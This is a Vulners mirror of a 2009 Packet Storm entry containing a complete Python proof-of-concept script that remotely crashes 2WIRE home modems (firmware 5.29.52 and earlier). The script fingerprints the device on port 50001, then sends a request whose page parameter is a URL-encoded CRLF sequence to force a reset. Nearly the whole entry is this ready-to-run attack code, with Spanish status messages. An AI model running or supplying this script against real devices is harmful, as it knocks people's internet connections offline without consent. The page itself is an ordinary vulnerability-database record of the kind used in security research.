Lucene search
K

2WIRE Remote Denial Of Service Proof Of Concept

🗓️ 30 Oct 2009 00:00:00Reported by hkmType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

2WIRE Remote Denial Of Service Proof Of Concept

Code
`print "\n #################################################"  
print " # 2WIRE REMOTE DoS (FW =< 5.29.52) #"  
print " # #"  
print " # [email protected] #"  
print " #################################################\n"  
  
import socket, sys, urllib2   
  
socket.setdefaulttimeout(4)  
  
try:  
ip = sys.argv[1]  
except:  
print " [IP ERROR] -> python 2os.py 123.123.123.123\n"  
sys.exit()  
  
if not len(ip.split(".")) == 4:  
print " [IP ERROR] -> python 2os.py 123.123.123.123\n"  
sys.exit()  
  
print " [ ] Detectando el dispositivo"  
try:  
server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info())  
print " [+] Detectado "+server[int(server.find("Server:"))+8:int(server.find("\n",int(server.find("Server:"))))]  
except:  
print " [-] No detectado\n"  
sys.exit()  
  
print " [ ] Lanzando el ataque"  
try: str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=%0d%0a")).read())  
except: pass  
  
try:  
server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info())  
print " [-] No vulnerable\n"  
except:  
print " [+] MODEM RESETADO! EAEA!\n"  
sys.exit()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Oct 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
44